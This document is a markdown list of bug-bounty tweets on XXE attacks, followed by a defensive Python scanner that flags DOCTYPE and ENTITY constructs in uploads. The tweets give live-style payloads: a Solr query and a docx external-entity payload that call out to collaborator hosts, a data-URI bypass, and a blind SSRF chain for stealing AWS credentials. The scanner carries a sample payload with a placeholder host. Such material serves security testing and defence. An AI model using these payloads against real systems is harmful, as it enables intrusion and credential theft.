# XXE

* [see an apache solr GET/POST to /select ? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='\<!DOCTYPE a SYSTEM "http://collab.burp.net">\<a>\</a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty](https://twitter.com/huntmost/status/1195507306919804928)
* [#bugbountytip Company fixed an XXE by blocking arbitrary URL(s) to grab an SVG? Try & bypass it by embedding the SVG using the Data URI protocol handler \[data:image/svg+xml;base64,XXE\_PAYLOAD\], most of the time it would work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity](https://twitter.com/prateek_0490/status/1046077319801184259)
* [XXE by injecting METADATA in Image bytes --> Blind SSRF via local dtd --> grabbed AWS EC2 credentials blindly --> Powned #bugbountytips #bugbountytip](https://twitter.com/HusseiN98D/status/1257825228341874689)
* [jobs.targ.com site fills in personal info by uploading cv & parsing. Accepted docx, pdf, etc. 1. Unzip docx & edit word/document.xml 2. Add \<!DOCTYPE foo \[\<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;\]> 3. Upload 4. Profit! #BugBounty](https://twitter.com/huntmost/status/1180649484759572480)
* [#BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on @Burp\_Suite to achieve this!](https://twitter.com/HusseiN98D/status/1219750207287676933)

* <https://twitter.com/Kei0x/status/1172267556226445313>

* [XXE](https://twitter.com/11xuxx/status/1250764273623629826?s=20)

  1. change password func -> JSON
  2. converted to XML -> 200 OK
  3. created dtd file on my ec2 and started webserver on port 80
  4. crafted an XXE payload!
  5. bounty!

  Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change the content-type.
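A defender's counterpart to the tips above (SVG smuggled in a base64 data: URI, a docx upload with an edited word/document.xml, a JSON body resubmitted as XML): an added example, not from any of the tweets, that scans a request body or uploaded file for the DOCTYPE/ENTITY constructs those payloads need, unpacking Office zips and data: URIs first so the bypasses the tips describe still get caught. The `dtd.example` host and all sample inputs are constructed placeholders.

```python
import base64, io, re, zipfile

# A DOCTYPE that opens an internal subset ("[") or names an external DTD
# (SYSTEM/PUBLIC) is what every tip above relies on; a bare <!DOCTYPE html>
# does not match. PUBLIC is flagged too, since some parsers still fetch it.
_DTD_RE = re.compile(rb"<!DOCTYPE\b[^>]*?(?:\[|SYSTEM|PUBLIC)", re.I | re.S)
_ENTITY_RE = re.compile(rb"<!ENTITY\b", re.I)
_DATA_URI_RE = re.compile(rb"data:[\w/+.-]+;base64,([A-Za-z0-9+/=]+)")

def _xml_findings(data: bytes, where: str) -> list:
    findings = []
    if _DTD_RE.search(data):
        findings.append(f"{where}: DOCTYPE with internal subset or external DTD")
    if _ENTITY_RE.search(data):
        findings.append(f"{where}: ENTITY declaration")
    return findings

def scan_upload(blob: bytes, name: str = "upload") -> list:
    """XXE indicators in a request body or uploaded file; looks inside
    zip containers (docx/xlsx XML parts) and base64 data: URIs."""
    if blob.startswith(b"PK\x03\x04"):  # Office documents are zip files
        findings = []
        try:
            with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                for member in zf.namelist():
                    if member.lower().endswith((".xml", ".rels")):
                        findings += _xml_findings(zf.read(member), f"{name}/{member}")
        except zipfile.BadZipFile:
            findings.append(f"{name}: zip signature but unreadable archive")
        return findings
    findings = _xml_findings(blob, name)
    for m in _DATA_URI_RE.finditer(blob):  # SVG/XML hidden in a data: URI
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            continue
        findings += _xml_findings(decoded, f"{name}/data-uri")
    return findings

def build_sample_docx(document_xml: bytes) -> bytes:
    """Constructed minimal docx-shaped zip for the demo, not a real document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", b'<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()

# Constructed samples mirroring the tips above (dtd.example is a placeholder).
XXE_XML = b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://dtd.example/mal.dtd"> %xxe;]><a/>'
SVG_DATA_URI = b"data:image/svg+xml;base64," + base64.b64encode(XXE_XML)
```

Run this on the raw body before it reaches any XML parser; the parser itself should still have DTD and external entity resolution disabled, since this scan is a detection layer, not a substitute.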
